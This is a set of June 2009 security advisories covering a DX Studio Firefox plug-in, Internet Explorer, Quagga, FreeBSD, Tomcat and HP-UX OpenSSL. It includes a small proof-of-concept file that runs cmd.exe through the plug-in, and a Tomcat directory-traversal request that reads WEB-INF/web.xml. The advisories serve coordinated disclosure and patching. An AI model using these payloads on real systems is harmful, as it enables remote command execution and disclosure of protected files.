CORE-2009-0521 - DX Studio Player Firefox plug-in command injection
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ DX Studio Player Firefox plug-in command injection 1. *Advisory Information* Title: DX Studio Player Firefox plug-in command injection Advisory ID: CORE-2009-0521 Advisory URL: http://www.coresecurity.com/content/DXStudio-player-firefox-plugin Date published: 2009-06-09 Date of last update: 2009-06-09 Vendors contacted: Worldweaver Release mode: Coordinated release 2. *Vulnerability Information* Class: Command injection Remotely Exploitable: Yes Locally Exploitable: No Bugtraq ID: N/A CVE Name: CVE-2009-2011 3. *Vulnerability Description* DX Studio [1] is a complete integrated development environment for creating interactive 3D graphics. DX Studio Player plug-in for Firefox [2] is vulnerable to a remote command execution vulnerability. 4. *Vulnerable packages* . DX Studio Player v3.0.29.0 . DX Studio Player v3.0.22.0 . DX Studio Player v3.0.12.0 . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . DX Studio Player v3.0.29.1 6. *Vendor Information, Solutions and Workarounds* On June 1st DXStudio team patched the current release 3.0.29 to 3.0.29.1 for all new downloads to fix the problem with the Firefox plugin, and also posted a sticky announce for all its users [3]. 7. *Credits* This vulnerability was discovered and researched by Diego Juarez from Core Security Technologies. 8. *Technical Description / Proof of Concept Code* DX Studio is a complete integrated development environment for creating interactive 3D graphics. DX Studio provides a javascript API in which the method 'shell.execute()' is defined as follows: /--- Prototype: shell.execute(commandString, [paramString], [commandIsProgId]); - ---/ This method sends the 'commandString' to the Windows shell with optional parameters in 'paramString'. For security reasons, this function is not available when running in a web browser. If you set 'commandIsProgId' to true, you can launch a utility by its 'ProgID', e.g. 'WMP.DVD' with parameter 'play' would play a DVD in Windows Media Player. In our tests, despite what is stated in the documentation, we found that the function is actually available to both the Internet Explorer and Firefox browser plug-ins. In the IE plug-in the user does get a warning about the security implications of allowing such '.dxstudio' file to run. On Firefox however, there is no such warning whatsoever, allowing an attacker to execute arbitrary code on the client side by luring the victim into clicking a link or visiting a malicious website. 8.1. *Proof of Concept (header.xml)* /--- ?xml version=1.0 encoding=utf-8 standalone=yes? dxstudio version=1.0.0 width=800 height=600 defaultscriptlanguage=javascript display frame=yes hidecursor=no hideconsole=no hidecontext=no maxfps=100 unthrottled=no priority=normal syncrefresh=yes changeresolution=no userresize=yes workarea=no windowmask=no src= minplayerversion=1.0.0 loading console=yes custom=no custombackground=no customlogo=yes showversion=no prop id=background type=color r=0 g=0 b=0 a=1 / logo src= / customprogress / /loading /display script ![CDATA[function onInit() { shell.execute(cmd.exe,/k cls|@echo this is wrong, very wrong.) } ] ] /script licenseinfo stamp=cgda / security prop id=password type=string value= / prop id=allowplayer type=bool state=no / prop id=nocache type=bool state=yes / /security /dxstudio - ---/ Note: The security vulnerability is also exploitable on the standalone player, however, this functionality appears to be the expected behavior and fully intended for the standalone player. 9. *Report Timeline* . 2009-05-21: Core Security Technologies notifies the Worldweaver Support Team (WST) of the vulnerability and announces its initial plan to publish the content on June 15th, 2009. . 2009-05-26: The WST asks Core for a technical description of the vulnerability. . 2009-05-26: Technical details sent to WST by Core. . 2009-06-08: Core asks WST for an estimated date to fix this issue. . 2009-06-08: WST notifies Core that a fix has already been produced and it is available to the users. . 2009-06-09: The advisory CORE-2009-0521 is published. 10. *References* [1] http://www.dxstudio.com. [2] http://www.dxstudio.com/download2.aspx. [3] http://www.dxstudio.com/forumtopic.aspx?topicid=b4152459-fb5f-4933-b700-b3fbd54f6bfd 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem
CORE-2008-0826 - Internet Explorer Security Zone restrictions bypass
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Internet Explorer Security Zone restrictions bypass 1. *Advisory Information* Title: Internet Explorer Security Zone restrictions bypass Advisory ID: CORE-2008-0826 Advisory URL: http://www.coresecurity.com/content/ie-security-zone-bypass Date published: 2009-06-09 Date of last update: 2009-06-09 Vendors contacted: Microsoft Release mode: Coordinated release 2. *Vulnerability Information* Class: Client side Remotely Exploitable: Yes Locally Exploitable: Yes Bugtraq ID: 33178 CVE Name: CVE-2009-1140 3. *Vulnerability Description* Internet Explorer (IE) is the most widely used Web browser, with an estimated count of 1,100 million users according to a worldwide survey conducted and published in 2008 [1]. This advisory describes a vulnerability that provides access to the contents of any file stored in the local filesystem of user's machines running vulnerable versions of IE. Exploitation of the vulnerability relies solely on the ability for a would-be attacker to provide malicious HTML content from a website and to predict the full pathname for the file that will be used to cache it locally on the victim's system. If the entire path name can be predicted, the attacker can cause a redirection to the locally stored file using an URI specified in UNC form and force the local content to be rendered as an HTML document, which will permit to run scripting commands and instantiate certain ActiveX controls. As a result of a successful attack, security or privacy-sensitive information can be obtained by an attacker including but not limited to user authentication credentials for any web application domain, HTTP cookies, session management data, cached content of web applications in different domains and any files stored on local filesystems. The bug is related to a lack of enforcement of security policies assigned to URL Security Zones [2] when content from the corresponding zone is loaded and rendered from a local file. These issues have been found in the way that security policies are applied when a URI is specified in the UNC form (i.e., '\\MACHINE_NAME_OR_IP\PATH_TO_RESOURCE'): 1. When a remote site attempts to access a local resource, IE will fail to enforce the Zone Elevation restrictions. 2. When browsing a remote site, IE will not properly enforce the Security Zone permissions, allowing a site belonging to a less secure zone to be treated as belonging to a more privileged one. 4. *Vulnerable packages* . Internet Explorer 5.01 Service Pack 4 . Internet Explorer 6.0 . Internet Explorer 6.0 Service Pack 1 . Internet Explorer 7 (not exploitable with Protected mode on, available on Vista) 4.1. *Vulnerable platforms* . Microsoft Windows 2000 up to and including Service Pack 4 . Microsoft Windows Server 2003 up to and including Service Pack 2 . Microsoft Windows XP up to and including Service Pack 3 . Windows Vista up to and including Service Pack 1 (not exploitable with IE running with Protected mode on) . Windows Server 2008 5. *Non-vulnerable packages* . Internet Explorer 8 under Windows 2000/2003/XP/Vista 6. *Vendor Information, Solutions and Workarounds* The following workarounds can prevent exploitation of the vulnerability: . Use Internet Explorer's Protocol Lockdown feature control to restrict the file protocol to prevent HTML from UNC path to run script or ActiveX controls. . Set the Security Level setting for the Internet and Intranet Zones to High to prevent IE from running scripts or ActiveX controls. . Manually disable Active Scripting for the Internet and Intranet Zone with a custom security setting. . Only run IE in Protected Mode if it is available on the operating system. . Use a different web browser to navigate untrusted web sites. Additionally, although disabling file sharing if it is not necessary and filtering outbound SMB connections at the endpoint or network perimeter may not prevent exploitation it is generally a good security measure to prevent disclosure of sensitive information such as valid usernames of endpoint users. Microsoft has issued a patch to fix the vulnerability and a detailed description of how to implement the workarounds on IE. It is available as Security Bulletin http://go.microsoft.com/fwlink/?LinkID=150860. Microsoft's Research and Defense blog has further discussion about the vulnerability, workarounds and mitigations [3]. 7. *Credits* This vulnerability was discovered and researched by Jorge Luis Alvarez Medina from Core Security Consulting Services (SCS). Additional research was made by Federico Muttis from Core Security Exploit Writers Team (EWT). 8. *Technical Description / Proof of Concept Code* Internet Explorer uses a feature known as URL Security Zones [2], which defines a set of privileges for Web sites and applications
catching up on several recently fixed bugs of note
Hi all, I am way behind on this, so I wanted to drop a quick note regarding some of my vulnerabilities recently addressed by browser vendors - and provide some possibly interesting PoCs / fuzzers to go with them: Summary : MSIE same-origin bypass race condition (CVE-2007-3091) Impact : security bypass, possibly more Reported : June 2007 (publicly) PoC URL : http://lcamtuf.coredump.cx/ierace/ Bulletin : http://www.microsoft.com/technet/security/bulletin/MS09-019.mspx Notes: additional credit to David Bloom for developing an improved proof-of-concept exploit Summary : MSIE memory corruption on page transitions Impact : memory corruption, potential code execution Reported : April 2008 (privately) PoC URL : http://lcamtuf.coredump.cx/stest/ (fuzzers) Bulletin : http://www.microsoft.com/technet/security/Bulletin/MS09-014.mspx Notes: - Summary : multiple browsers CANVAS implementation crashes (CVE-2008-2321, ???) Impact : memory corruption, potential code execution Reported : February 2008 (privately) PoC URL : http://lcamtuf.coredump.cx/canvas/ (fuzzer) Bulletin : http://lists.apple.com/archives/security-announce/2009/Jun/msg2.html Bulletin : http://www.opera.com/support/kb/view/882/ Notes: also some DoS issues in Firefox Summary : Safari page transition tailgating (CVE-2009-1684) Impact : page spoofing, navigation target disclosure Reported : February 2008 (privately) PoC URL : http://lcamtuf.coredump.cx/sftrap2/ Bulletin : http://lists.apple.com/archives/security-announce/2009/Jun/msg2.html Notes: - Cheers, /mz
[USN-775-2] Quagga regression
=== Ubuntu Security Notice USN-775-2 June 09, 2009 quagga regression https://launchpad.net/bugs/384193 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: quagga 0.99.2-1ubuntu3.6 Ubuntu 8.04 LTS: quagga 0.99.9-2ubuntu1.3 Ubuntu 8.10: quagga 0.99.9-6ubuntu0.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-775-1 fixed vulnerabilities in Quagga. The preventative fixes introduced in Quagga prior to Ubuntu 9.04 could result in BGP service failures. This update fixes the problem. We apologize for the inconvenience. Original advisory details: It was discovered that the BGP service in Quagga did not correctly handle certain AS paths containing 4-byte ASNs. An authenticated remote attacker could exploit this flaw to cause bgpd to abort, leading to a denial of service. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6.diff.gz Size/MD5:33723 68d422d6bc1144c884c8d3464b2d7132 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6.dsc Size/MD5: 808 f99f295766118d53be45a1186c2c0a98 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2.orig.tar.gz Size/MD5: 2185137 88087d90697fcf5fe192352634f340b3 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.99.2-1ubuntu3.6_all.deb Size/MD5: 664150 cdb4f6e8bd79bd87efb0e0c083ea5102 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6_amd64.deb Size/MD5: 1404194 f771faa047cb099f9c2413e9f06a9228 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6_i386.deb Size/MD5: 1199178 8c288bcee96507962ffb0b95e26cc77c powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6_powerpc.deb Size/MD5: 1351356 8803c7a2df4bdc196a8746199badd6c7 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6_sparc.deb Size/MD5: 1322370 0412d82e928f89a739287456b43f355a Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3.diff.gz Size/MD5:35961 52f3b6d3d31515936f582dea2ff81322 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3.dsc Size/MD5: 1022 d4a0caac214e93c40cb73c5066dca423 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9.orig.tar.gz Size/MD5: 2341067 4dbdaf91bf6609803819d97d5fccc4c9 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.99.9-2ubuntu1.3_all.deb Size/MD5: 661722 a301f125c189a5147022712c7beb043d amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3_amd64.deb Size/MD5: 1619806 e455a7297029d4041f67e88ba20e3c04 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3_i386.deb Size/MD5: 1464714 0dbc4715b946e5acf8ce082cc7e4d84c lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3_lpia.deb Size/MD5: 1461224 de1ec96b620619222ddb8f14a62a2b2c powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3_powerpc.deb Size/MD5: 1658750 10e87db24545fd262e9ab09c454dbcb3 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3_sparc.deb Size/MD5: 1521338 da17c3904269a1c02f44c885ea11910e Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-6ubuntu0.2.diff.gz Size/MD5:35942 c398f6251074d10961f61146438ca43b http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-6ubuntu0.2.dsc Size/MD5: 1486 69e9c33ac728149c88a14e9ec3aa3d19 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9.orig.tar.gz Size/MD5: 2341067 4dbdaf91bf6609803819d97d5fccc4c9 Architecture independent
FreeBSD Security Advisory FreeBSD-SA-09:11.ntpd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 = FreeBSD-SA-09:11.ntpd Security Advisory The FreeBSD Project Topic: ntpd stack-based buffer-overflow vulnerability Category: contrib Module: ntpd Announced: 2009-06-10 Credits:Chris Ries Affects:All supported versions of FreeBSD. Corrected: 2009-06-10 10:31:11 UTC (RELENG_7, 7.2-STABLE) 2009-06-10 10:31:11 UTC (RELENG_7_2, 7.2-RELEASE-p1) 2009-06-10 10:31:11 UTC (RELENG_7_1, 7.1-RELEASE-p6) 2009-06-10 10:31:11 UTC (RELENG_6, 6.4-STABLE) 2009-06-10 10:31:11 UTC (RELENG_6_4, 6.4-RELEASE-p5) 2009-06-10 10:31:11 UTC (RELENG_6_3, 6.3-RELEASE-p11) CVE Name: CVE-2009-1252 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit URL:http://security.FreeBSD.org/. I. Background The ntpd(8) daemon is an implementation of the Network Time Protocol (NTP) used to synchronize the time of a computer system to a reference time source. Autokey is a security model for authenticating Network Time Protocol (NTP) servers to clients, using public key cryptography. II. Problem Description The ntpd(8) daemon is prone to a stack-based buffer-overflow when it is configured to use the 'autokey' security model. III. Impact This issue could be exploited to execute arbitrary code in the context of the service daemon, or crash the service daemon, causing denial-of-service conditions. IV. Workaround Use IP based restrictions in ntpd(8) itself or in IP firewalls to restrict which systems can send NTP packets to ntpd(8). Note that systems will only be affected if they have the autokey option set in /etc/ntp.conf; FreeBSD does not ship with a default ntp.conf file, so will not be affected unless this option has been explicitly enabled by the system administrator. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to 6-STABLE, or 7-STABLE, or to the RELENG_7_2, RELENG_7_1, RELENG_6_4, or RELENG_6_3 security branch dated after the correction date. 2) To patch your present system: The following patches have been verified to apply to FreeBSD 6.3, 6.4, 7.1, and 7.2 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 6.3] # fetch http://security.FreeBSD.org/patches/SA-09:11/ntpd63.patch # fetch http://security.FreeBSD.org/patches/SA-09:11/ntpd63.patch.asc [FreeBSD 6.4 and 7.x] # fetch http://security.FreeBSD.org/patches/SA-09:11/ntpd.patch # fetch http://security.FreeBSD.org/patches/SA-09:11/ntpd.patch.asc b) Execute the following commands as root: # cd /usr/src # patch /path/to/patch # cd /usr/src/usr.sbin/ntp/ntpd # make obj make depend make make install # /etc/rc.d/ntpd restart VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. CVS: Branch Revision Path - - RELENG_6 src/contrib/ntp/ntpd/ntp_crypto.c 1.1.1.3.8.3 RELENG_6_4 src/UPDATING 1.416.2.40.2.9 src/sys/conf/newvers.sh 1.69.2.18.2.11 src/contrib/ntp/ntpd/ntp_crypto.c 1.1.1.3.8.1.2.2 RELENG_6_3 src/UPDATING1.416.2.37.2.16 src/sys/conf/newvers.sh 1.69.2.15.2.15 src/contrib/ntp/ntpd/ntp_crypto.c 1.1.1.3.20.2 RELENG_7 src/contrib/ntp/ntpd/ntp_crypto.c 1.1.1.3.18.3 RELENG_7_2 src/UPDATING 1.507.2.23.2.4 src/sys/conf/newvers.sh 1.72.2.11.2.5 src/contrib/ntp/ntpd/ntp_crypto.c 1.1.1.3.18.2.2.1 RELENG_7_1 src/UPDATING 1.507.2.13.2.9 src/sys/conf/newvers.sh 1.72.2.9.2.10 src/contrib/ntp/ntpd/ntp_crypto.c 1.1.1.3.18.1.2.2 - - Subversion: Branch/path Revision - - stable/6/ r193893 releng/6.4/ r193893 releng/6.3/ r193893 stable/7/
FreeBSD Security Advisory FreeBSD-SA-09:10.ipv6
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 = FreeBSD-SA-09:10.ipv6 Security Advisory The FreeBSD Project Topic: Missing permission check on SIOCSIFINFO_IN6 ioctl Category: core Module: netinet6 Announced: 2009-06-10 Credits:Hiroki Sato Affects:All supported versions of FreeBSD. Corrected: 2009-06-10 10:31:11 UTC (RELENG_7, 7.2-STABLE) 2009-06-10 10:31:11 UTC (RELENG_7_2, 7.2-RELEASE-p1) 2009-06-10 10:31:11 UTC (RELENG_7_1, 7.1-RELEASE-p6) 2009-06-10 10:31:11 UTC (RELENG_6, 6.4-STABLE) 2009-06-10 10:31:11 UTC (RELENG_6_4, 6.4-RELEASE-p5) 2009-06-10 10:31:11 UTC (RELENG_6_3, 6.3-RELEASE-p11) For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit URL:http://security.FreeBSD.org/. I. Background IPv6 is a new Internet Protocol, designed to replace (and avoid many of the problems with) the current Internet Protocol (version 4). Many properties of the FreeBSD IPv6 network stack can be configured via the ioctl(2) interface. II. Problem Description The SIOCSIFINFO_IN6 ioctl is missing a necessary permissions check. III. Impact Local users, including non-root users and users inside jails, can set some IPv6 interface properties. These include changing the link MTU and disabling interfaces entirely. Note that this affects IPv6 only; IPv4 functionality cannot be affected by exploiting this vulnerability. IV. Workaround No workaround is available, but systems without local untrusted users are not vulnerable. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to 6-STABLE, or 7-STABLE, or to the RELENG_7_2, RELENG_7_1, RELENG_6_4, or RELENG_6_3 security branch dated after the correction date. 2) To patch your present system: The following patches have been verified to apply to FreeBSD 6.3, 6.4, 7.1, and 7.2 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 6.x] # fetch http://security.FreeBSD.org/patches/SA-09:10/ipv6-6.patch # fetch http://security.FreeBSD.org/patches/SA-09:10/ipv6-6.patch.asc [FreeBSD 7.x] # fetch http://security.FreeBSD.org/patches/SA-09:10/ipv6.patch # fetch http://security.FreeBSD.org/patches/SA-09:10/ipv6.patch.asc b) Apply the patch. # cd /usr/src # patch /path/to/patch c) Recompile your kernel as described in URL:http://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system. VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. CVS: Branch Revision Path - - RELENG_6 src/sys/netinet6/in6.c1.51.2.13 RELENG_6_4 src/UPDATING 1.416.2.40.2.9 src/sys/conf/newvers.sh 1.69.2.18.2.11 src/sys/netinet6/in6.c1.51.2.12.2.2 RELENG_6_3 src/UPDATING1.416.2.37.2.16 src/sys/conf/newvers.sh 1.69.2.15.2.15 src/sys/netinet6/in6.c1.51.2.11.2.1 RELENG_7 src/sys/netinet6/in6.c 1.73.2.7 RELENG_7_2 src/UPDATING 1.507.2.23.2.4 src/sys/conf/newvers.sh 1.72.2.11.2.5 src/sys/netinet6/in6.c 1.73.2.6.2.2 RELENG_7_1 src/UPDATING 1.507.2.13.2.9 src/sys/conf/newvers.sh 1.72.2.9.2.10 src/sys/netinet6/in6.c 1.73.2.4.2.2 - - Subversion: Branch/path Revision - - stable/6/ r193893 releng/6.4/ r193893 releng/6.3/ r193893 stable/7/ r193893 releng/7.2/ r193893 releng/7.1/ r193893 - - VII. References The latest revision of this advisory is
FreeBSD Security Advisory FreeBSD-SA-09:09.pipe
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 = FreeBSD-SA-09:09.pipe Security Advisory The FreeBSD Project Topic: Local information disclosure via direct pipe writes Category: core Module: kern Announced: 2009-06-10 Credits:Pieter de Boer Affects:All supported versions of FreeBSD. Corrected: 2009-06-10 10:31:11 UTC (RELENG_7, 7.2-STABLE) 2009-06-10 10:31:11 UTC (RELENG_7_2, 7.2-RELEASE-p1) 2009-06-10 10:31:11 UTC (RELENG_7_1, 7.1-RELEASE-p6) 2009-06-10 10:31:11 UTC (RELENG_6, 6.4-STABLE) 2009-06-10 10:31:11 UTC (RELENG_6_4, 6.4-RELEASE-p5) 2009-06-10 10:31:11 UTC (RELENG_6_3, 6.3-RELEASE-p11) For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit URL:http://security.FreeBSD.org/. I. Background One of the most commonly used forms of interprocess communication on FreeBSD and other UNIX-like systems is the (anonymous) pipe. In this mechanism, a pair of file descriptors is created, and data written to one descriptor can be read from the other. FreeBSD's pipe implementation contains an optimization known as direct writes. In this optimization, rather than copying data into kernel memory when the write(2) system call is invoked and then copying the data again when the read(2) system call is invoked, the FreeBSD kernel takes advantage of virtual memory mapping to allow the data to be copied directly between processes. II. Problem Description An integer overflow in computing the set of pages containing data to be copied can result in virtual-to-physical address lookups not being performed. III. Impact An unprivileged process can read pages of memory which belong to other processes or to the kernel. These may contain information which is sensitive in itself; or may contain passwords or cryptographic keys which can be indirectly exploited to gain sensitive information or access. IV. Workaround No workaround is available, but systems without untrusted local users are not vulnerable. System administrators are reminded that even if a system is not intended to have untrusted local users, it may be possible for an attacker to exploit some other vulnerability to obtain local user access to a system. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to 6-STABLE, or 7-STABLE, or to the RELENG_7_2, RELENG_7_1, RELENG_6_4, or RELENG_6_3 security branch dated after the correction date. 2) To patch your present system: The following patches have been verified to apply to FreeBSD 6.3, 6.4, 7.1, and 7.2 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch http://security.FreeBSD.org/patches/SA-09:09/pipe.patch # fetch http://security.FreeBSD.org/patches/SA-09:09/pipe.patch.asc b) Apply the patch. # cd /usr/src # patch /path/to/patch c) Recompile your kernel as described in URL:http://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system. VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. CVS: Branch Revision Path - - RELENG_6 src/sys/kern/sys_pipe.c 1.184.2.5 RELENG_6_4 src/UPDATING 1.416.2.40.2.9 src/sys/conf/newvers.sh 1.69.2.18.2.11 src/sys/kern/sys_pipe.c 1.184.2.4.2.2 RELENG_6_3 src/UPDATING1.416.2.37.2.16 src/sys/conf/newvers.sh 1.69.2.15.2.15 src/sys/kern/sys_pipe.c 1.184.2.2.6.2 RELENG_7 src/sys/kern/sys_pipe.c 1.191.2.5 RELENG_7_2 src/UPDATING 1.507.2.23.2.4 src/sys/conf/newvers.sh 1.72.2.11.2.5 src/sys/kern/sys_pipe.c 1.191.2.3.4.2 RELENG_7_1 src/UPDATING 1.507.2.13.2.9 src/sys/conf/newvers.sh 1.72.2.9.2.10 src/sys/kern/sys_pipe.c 1.191.2.3.2.2 - - Subversion: Branch/path Revision - - stable/6/
[SECURITY] UPDATED CVE-2008-5515 RequestDispatcher directory traversal vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Updated to add additional patches required for 5.5.x and 4.1.x CVE-2008-5515: Apache Tomcat information disclosure vulnerability Severity: Important Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.1.0 to 4.1.39 Tomcat 5.5.0 to 5.5.27 Tomcat 6.0.0 to 6.0.18 The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may be also affected Description: When using a RequestDispatcher obtained from the Request, the target path was normalised before the query string was removed. A request that included a specially crafted request parameter could be used to access content that would otherwise be protected by a security constraint or by locating it in under the WEB-INF directory. Mitigation: 6.0.x users should upgrade to 6.0.20 or apply this patch: http://svn.apache.org/viewvc?view=revrevision=734734 5.5.x users should upgrade to 5.5.28 when released or apply these patches: http://svn.apache.org/viewvc?view=revrevision=782757 http://svn.apache.org/viewvc?view=revrevision=783291 4.1.x users should upgrade to 4.1.40 when released or apply these patches: http://svn.apache.org/viewvc?view=revrevision=782763 http://svn.apache.org/viewvc?view=revrevision=783292 Example: For a page that contains: % request.getRequestDispatcher( bar.jsp?somepar=somevalpar= + request.getParameter( blah ) ).forward( request, response ); % an attacker can use: http://host/page.jsp?blah=/../WEB-INF/web.xml Credit: This issue was discovered by Iida Minehiko, Fujitsu Limited References: http://tomcat.apache.org/security.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkovmMwACgkQb7IeiTPGAkNPigCcDBEKxwuBoXnvixbqoqM8CIaN VKYAni4kHySG2JmbYi1hz4xAGpgm36Gr =7FT9 -END PGP SIGNATURE-
[security bulletin] HPSBUX02435 SSRT090059 rev.1 - HP-UX Running OpenSSL, Remote Denial of Service (DoS), Bypass Security Restrictions
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01762423 Version: 1 HPSBUX02435 SSRT090059 rev.1 - HP-UX Running OpenSSL, Remote Denial of Service (DoS), Bypass Security Restrictions NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2009-06-09 Last Updated: 2009-06-09 Potential Security Impact: Remote Denial of Service (DoS), bypass security restrictions Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP-UX running OpenSSL. These vulnerabilities could be exploited remotely to create a Denial of Service (DoS) and bypass security restrictions. References: CVE-2009-0590, CVE-2009-0591, CVE-2009-0789 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2009-0590 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2009-0591 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6 CVE-2009-0789 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. RESOLUTION HP has provided the following updates to resolve these vulnerabilities. The updates are available from the following location: URL: http://software.hp.com HP-UX Release HP-UX OpenSSL version B.11.11 (11i v1) A.00.09.07m.049 B.11.23 (11i v2) A.00.09.07m.050 B.11.31 (11i v3) A.00.09.08k.003 MANUAL ACTIONS: Yes - Update PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX B.11.11 == fips_1_1_2.FIPS-CONF fips_1_1_2.FIPS-DOC fips_1_1_2.FIPS-INC fips_1_1_2.FIPS-LIB fips_1_1_2.FIPS-MAN fips_1_1_2.FIPS-MIS fips_1_1_2.FIPS-RUN fips_1_1_2.FIPS-SRC action: install revision FIPS-OPENSSL-1.1.2.049 or subsequent fips_1_2.FIPS-CONF fips_1_2.FIPS-DOC fips_1_2.FIPS-INC fips_1_2.FIPS-LIB fips_1_2.FIPS-MAN fips_1_2.FIPS-MIS fips_1_2.FIPS-RUN fips_1_2.FIPS-SRC action: install revision FIPS-OPENSSL-1.2.001 or subsequent openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.07m.049 or subsequent URL: http://software.hp.com HP-UX B.11.23 == fips_1_1_2.FIPS-CONF fips_1_1_2.FIPS-DOC fips_1_1_2.FIPS-INC fips_1_1_2.FIPS-LIB fips_1_1_2.FIPS-MAN fips_1_1_2.FIPS-MIS fips_1_1_2.FIPS-RUN fips_1_1_2.FIPS-SRC action: install revision FIPS-OPENSSL-1.1.2.050 or subsequent fips_1_2.FIPS-CONF fips_1_2.FIPS-DOC fips_1_2.FIPS-INC fips_1_2.FIPS-LIB fips_1_2.FIPS-MAN fips_1_2.FIPS-MIS fips_1_2.FIPS-RUN fips_1_2.FIPS-SRC action: install revision FIPS-OPENSSL-1.2.002 or subsequent openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.07m.050 or subsequent URL: http://software.hp.com HP-UX B.11.31 == fips_1_1_2.FIPS-CONF fips_1_1_2.FIPS-DOC fips_1_1_2.FIPS-INC 